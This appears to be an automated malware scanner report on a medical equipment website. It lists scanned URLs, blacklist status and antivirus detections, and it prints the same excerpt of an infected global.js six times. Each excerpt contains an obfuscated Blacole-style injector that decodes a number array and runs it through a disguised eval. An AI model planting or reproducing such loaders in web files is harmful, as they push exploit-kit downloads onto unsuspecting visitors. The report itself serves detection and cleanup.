Malware Scanner report for medical-hospital-equipment.com

Malicious/Suspicious/Total urls checked: 6/0/15

6 pages have malicious code. See details below

Blacklists: Found

The website is marked by Google as suspicious.

The website "medical-hospital-equipment.com" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.

Malicious Redirects: OK

Malicious/Hidden/Total iFrames: 0/0/0

Deface / Content modification: OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

Malware Removal
Blacklists Removal
Reason Eliminating
1 Month Hack Insurance

More details

Website Hack Insurance

Files & DB Monitoring
Daily Backups
Malware & Hack Detection
Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=medical-hospital-equipment.com

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

Request	Server response	Status
http://www.medical-hospital-equipment.com/	200 OK Content-Length: 39786 Content-Type: text/html	clean
http://www.medical-hospital-equipment.com/js/global.js	200 OK Content-Length: 12228 Content-Type: text/javascript	malicious
Malicious code - confirmed by antiviruses (see below) document.write("<script src='js/validator.js' type='text/javascript' language='javascript'></script>"); function regetImage(obj) { var today = new Date(); var today_ms = "" + today.getFullYear() + (today.getMonth() + 1) + today.getDate() + today.getMinutes() + today.getSeconds() + today.getMilliseconds(); obj.src = '../include/auth/getimage.php?' + today_ms; } function bookmarkit(href,title){ if(href==null){href=lo ... 3309 bytes are skipped ...1f","27","d","a","9","3m","47","3l","4d","45","3n","46","4c","1k","3l","47","47","43","41","3n","29","1d","4c","3n","4b","4c","3l","47","47","43","41","3n","1n","29","1d","1h","4a","4b","1e","1f","1h","1d","27","16","3n","4g","48","41","4a","3n","4b","29","1d","1h","3n","4g","48","1k","4c","47","2j","2p","36","35","4c","4a","41","46","3p","1e","1f","27","d","a","4l"];h=2;s="";if(zxc){for(i=0;i-609!=0;i++){k=i;s+=String.fromCharCode(parseInt(n[i],26));}z=s;vl="val";if(ww.document)ww["e"+vl](z)}}} Antivirus reports: AntiVir JS/BlacoleRef.CM Avast JS:Decode-ARV [Trj] Ikarus Trojan-Downloader.JS.Agent K7AntiVirus Exploit ( 04c55c671 ) TrendMicro-HouseCall JS_BLACOLE.SMAP Comodo TrojWare.JS.Blacole.YA CAT-QuickHeal JS/BlacoleRef.CN K7GW Exploit ( 04c55c671 ) McAfee-GW-Edition JS/Exploit-Blacole.ht TrendMicro JS_BLACOLE.SMAP Microsoft Trojan:JS/BlacoleRef.CM Kaspersky Trojan-Downloader.JS.Agent.gvn Fortinet JS/Blacole.HT!exploit Jiangmin Trojan/Script.Gen McAfee JS/Exploit-Blacole.ht VIPRE Trojan.JS.BlacoleRef.cm (v) AVG HTML/Framer Symantec JS.Runfore
http://s17.cnzz.com/stat.php?id=2437986&web_id=2437986&show=pic	200 OK Content-Length: 9325 Content-Type: application/javascript	clean
http://js.users.51.la/3933382.js	200 OK Content-Length: 1978 Content-Type: application/x-javascript	clean
http://www.medical-hospital-equipment.com/./	200 OK Content-Length: 39786 Content-Type: text/html	clean
http://www.medical-hospital-equipment.com/./js/global.js	200 OK Content-Length: 12228 Content-Type: text/javascript	malicious
Malicious code - confirmed by antiviruses (see below) document.write("<script src='js/validator.js' type='text/javascript' language='javascript'></script>"); function regetImage(obj) { var today = new Date(); var today_ms = "" + today.getFullYear() + (today.getMonth() + 1) + today.getDate() + today.getMinutes() + today.getSeconds() + today.getMilliseconds(); obj.src = '../include/auth/getimage.php?' + today_ms; } function bookmarkit(href,title){ if(href==null){href=lo ... 3309 bytes are skipped ...1f","27","d","a","9","3m","47","3l","4d","45","3n","46","4c","1k","3l","47","47","43","41","3n","29","1d","4c","3n","4b","4c","3l","47","47","43","41","3n","1n","29","1d","1h","4a","4b","1e","1f","1h","1d","27","16","3n","4g","48","41","4a","3n","4b","29","1d","1h","3n","4g","48","1k","4c","47","2j","2p","36","35","4c","4a","41","46","3p","1e","1f","27","d","a","4l"];h=2;s="";if(zxc){for(i=0;i-609!=0;i++){k=i;s+=String.fromCharCode(parseInt(n[i],26));}z=s;vl="val";if(ww.document)ww["e"+vl](z)}}} Antivirus reports: AntiVir JS/BlacoleRef.CM Avast JS:Decode-ARV [Trj] Ikarus Trojan-Downloader.JS.Agent K7AntiVirus Exploit ( 04c55c671 ) TrendMicro-HouseCall JS_BLACOLE.SMAP Comodo TrojWare.JS.Blacole.YA CAT-QuickHeal JS/BlacoleRef.CN K7GW Exploit ( 04c55c671 ) McAfee-GW-Edition JS/Exploit-Blacole.ht TrendMicro JS_BLACOLE.SMAP Microsoft Trojan:JS/BlacoleRef.CM Kaspersky Trojan-Downloader.JS.Agent.gvn Fortinet JS/Blacole.HT!exploit Jiangmin Trojan/Script.Gen McAfee JS/Exploit-Blacole.ht VIPRE Trojan.JS.BlacoleRef.cm (v) AVG HTML/Framer Symantec JS.Runfore
http://www.medical-hospital-equipment.com/././	200 OK Content-Length: 39786 Content-Type: text/html	clean
http://www.medical-hospital-equipment.com/././js/global.js	200 OK Content-Length: 12228 Content-Type: text/javascript	malicious
Malicious code - confirmed by antiviruses (see below) document.write("<script src='js/validator.js' type='text/javascript' language='javascript'></script>"); function regetImage(obj) { var today = new Date(); var today_ms = "" + today.getFullYear() + (today.getMonth() + 1) + today.getDate() + today.getMinutes() + today.getSeconds() + today.getMilliseconds(); obj.src = '../include/auth/getimage.php?' + today_ms; } function bookmarkit(href,title){ if(href==null){href=lo ... 3309 bytes are skipped ...1f","27","d","a","9","3m","47","3l","4d","45","3n","46","4c","1k","3l","47","47","43","41","3n","29","1d","4c","3n","4b","4c","3l","47","47","43","41","3n","1n","29","1d","1h","4a","4b","1e","1f","1h","1d","27","16","3n","4g","48","41","4a","3n","4b","29","1d","1h","3n","4g","48","1k","4c","47","2j","2p","36","35","4c","4a","41","46","3p","1e","1f","27","d","a","4l"];h=2;s="";if(zxc){for(i=0;i-609!=0;i++){k=i;s+=String.fromCharCode(parseInt(n[i],26));}z=s;vl="val";if(ww.document)ww["e"+vl](z)}}} Antivirus reports: AntiVir JS/BlacoleRef.CM Avast JS:Decode-ARV [Trj] Ikarus Trojan-Downloader.JS.Agent K7AntiVirus Exploit ( 04c55c671 ) TrendMicro-HouseCall JS_BLACOLE.SMAP Comodo TrojWare.JS.Blacole.YA CAT-QuickHeal JS/BlacoleRef.CN K7GW Exploit ( 04c55c671 ) McAfee-GW-Edition JS/Exploit-Blacole.ht TrendMicro JS_BLACOLE.SMAP Microsoft Trojan:JS/BlacoleRef.CM Kaspersky Trojan-Downloader.JS.Agent.gvn Fortinet JS/Blacole.HT!exploit Jiangmin Trojan/Script.Gen McAfee JS/Exploit-Blacole.ht VIPRE Trojan.JS.BlacoleRef.cm (v) AVG HTML/Framer Symantec JS.Runfore
http://www.medical-hospital-equipment.com/./././	200 OK Content-Length: 39786 Content-Type: text/html	clean
http://www.medical-hospital-equipment.com/./././js/global.js	200 OK Content-Length: 12228 Content-Type: text/javascript	malicious
Malicious code - confirmed by antiviruses (see below) document.write("<script src='js/validator.js' type='text/javascript' language='javascript'></script>"); function regetImage(obj) { var today = new Date(); var today_ms = "" + today.getFullYear() + (today.getMonth() + 1) + today.getDate() + today.getMinutes() + today.getSeconds() + today.getMilliseconds(); obj.src = '../include/auth/getimage.php?' + today_ms; } function bookmarkit(href,title){ if(href==null){href=lo ... 3309 bytes are skipped ...1f","27","d","a","9","3m","47","3l","4d","45","3n","46","4c","1k","3l","47","47","43","41","3n","29","1d","4c","3n","4b","4c","3l","47","47","43","41","3n","1n","29","1d","1h","4a","4b","1e","1f","1h","1d","27","16","3n","4g","48","41","4a","3n","4b","29","1d","1h","3n","4g","48","1k","4c","47","2j","2p","36","35","4c","4a","41","46","3p","1e","1f","27","d","a","4l"];h=2;s="";if(zxc){for(i=0;i-609!=0;i++){k=i;s+=String.fromCharCode(parseInt(n[i],26));}z=s;vl="val";if(ww.document)ww["e"+vl](z)}}} Antivirus reports: AntiVir JS/BlacoleRef.CM Avast JS:Decode-ARV [Trj] Ikarus Trojan-Downloader.JS.Agent K7AntiVirus Exploit ( 04c55c671 ) TrendMicro-HouseCall JS_BLACOLE.SMAP Comodo TrojWare.JS.Blacole.YA CAT-QuickHeal JS/BlacoleRef.CN K7GW Exploit ( 04c55c671 ) McAfee-GW-Edition JS/Exploit-Blacole.ht TrendMicro JS_BLACOLE.SMAP Microsoft Trojan:JS/BlacoleRef.CM Kaspersky Trojan-Downloader.JS.Agent.gvn Fortinet JS/Blacole.HT!exploit Jiangmin Trojan/Script.Gen McAfee JS/Exploit-Blacole.ht VIPRE Trojan.JS.BlacoleRef.cm (v) AVG HTML/Framer Symantec JS.Runfore
http://www.medical-hospital-equipment.com/././././	200 OK Content-Length: 39786 Content-Type: text/html	clean
http://www.medical-hospital-equipment.com/././././js/global.js	200 OK Content-Length: 12228 Content-Type: text/javascript	malicious
Malicious code - confirmed by antiviruses (see below) document.write("<script src='js/validator.js' type='text/javascript' language='javascript'></script>"); function regetImage(obj) { var today = new Date(); var today_ms = "" + today.getFullYear() + (today.getMonth() + 1) + today.getDate() + today.getMinutes() + today.getSeconds() + today.getMilliseconds(); obj.src = '../include/auth/getimage.php?' + today_ms; } function bookmarkit(href,title){ if(href==null){href=lo ... 3309 bytes are skipped ...1f","27","d","a","9","3m","47","3l","4d","45","3n","46","4c","1k","3l","47","47","43","41","3n","29","1d","4c","3n","4b","4c","3l","47","47","43","41","3n","1n","29","1d","1h","4a","4b","1e","1f","1h","1d","27","16","3n","4g","48","41","4a","3n","4b","29","1d","1h","3n","4g","48","1k","4c","47","2j","2p","36","35","4c","4a","41","46","3p","1e","1f","27","d","a","4l"];h=2;s="";if(zxc){for(i=0;i-609!=0;i++){k=i;s+=String.fromCharCode(parseInt(n[i],26));}z=s;vl="val";if(ww.document)ww["e"+vl](z)}}} Antivirus reports: AntiVir JS/BlacoleRef.CM Avast JS:Decode-ARV [Trj] Ikarus Trojan-Downloader.JS.Agent K7AntiVirus Exploit ( 04c55c671 ) TrendMicro-HouseCall JS_BLACOLE.SMAP Comodo TrojWare.JS.Blacole.YA CAT-QuickHeal JS/BlacoleRef.CN K7GW Exploit ( 04c55c671 ) McAfee-GW-Edition JS/Exploit-Blacole.ht TrendMicro JS_BLACOLE.SMAP Microsoft Trojan:JS/BlacoleRef.CM Kaspersky Trojan-Downloader.JS.Agent.gvn Fortinet JS/Blacole.HT!exploit Jiangmin Trojan/Script.Gen McAfee JS/Exploit-Blacole.ht VIPRE Trojan.JS.BlacoleRef.cm (v) AVG HTML/Framer Symantec JS.Runfore
http://www.medical-hospital-equipment.com/./././././	200 OK Content-Length: 39786 Content-Type: text/html	clean
http://www.medical-hospital-equipment.com/./././././js/global.js	200 OK Content-Length: 12228 Content-Type: text/javascript	malicious
Malicious code - confirmed by antiviruses (see below) document.write("<script src='js/validator.js' type='text/javascript' language='javascript'></script>"); function regetImage(obj) { var today = new Date(); var today_ms = "" + today.getFullYear() + (today.getMonth() + 1) + today.getDate() + today.getMinutes() + today.getSeconds() + today.getMilliseconds(); obj.src = '../include/auth/getimage.php?' + today_ms; } function bookmarkit(href,title){ if(href==null){href=lo ... 3309 bytes are skipped ...1f","27","d","a","9","3m","47","3l","4d","45","3n","46","4c","1k","3l","47","47","43","41","3n","29","1d","4c","3n","4b","4c","3l","47","47","43","41","3n","1n","29","1d","1h","4a","4b","1e","1f","1h","1d","27","16","3n","4g","48","41","4a","3n","4b","29","1d","1h","3n","4g","48","1k","4c","47","2j","2p","36","35","4c","4a","41","46","3p","1e","1f","27","d","a","4l"];h=2;s="";if(zxc){for(i=0;i-609!=0;i++){k=i;s+=String.fromCharCode(parseInt(n[i],26));}z=s;vl="val";if(ww.document)ww["e"+vl](z)}}} Antivirus reports: AntiVir JS/BlacoleRef.CM Avast JS:Decode-ARV [Trj] Ikarus Trojan-Downloader.JS.Agent K7AntiVirus Exploit ( 04c55c671 ) TrendMicro-HouseCall JS_BLACOLE.SMAP Comodo TrojWare.JS.Blacole.YA CAT-QuickHeal JS/BlacoleRef.CN K7GW Exploit ( 04c55c671 ) McAfee-GW-Edition JS/Exploit-Blacole.ht TrendMicro JS_BLACOLE.SMAP Microsoft Trojan:JS/BlacoleRef.CM Kaspersky Trojan-Downloader.JS.Agent.gvn Fortinet JS/Blacole.HT!exploit Jiangmin Trojan/Script.Gen McAfee JS/Exploit-Blacole.ht VIPRE Trojan.JS.BlacoleRef.cm (v) AVG HTML/Framer Symantec JS.Runfore
http://www.medical-hospital-equipment.com/././././././	200 OK Content-Length: 39786 Content-Type: text/html	clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: medical-hospital-equipment.com

Result:

Second query (visit from search engine):
GET / HTTP/1.1
Host: medical-hospital-equipment.com
Referer: http://www.google.com/search?q=medical-hospital-equipment.com

Result:
The result is similar to the first query. There are no suspicious redirects found.

Recently found suspicious websites

Malware Scanner report for medical-hospital-equipment.com

Malware & Hack Repair

Website Hack Insurance

Safe Browsing / Blacklists

Scanned pages/files

Malicious Redirects

Recently found suspicious websites

Company

Services

eVuln Labs

eVuln Tools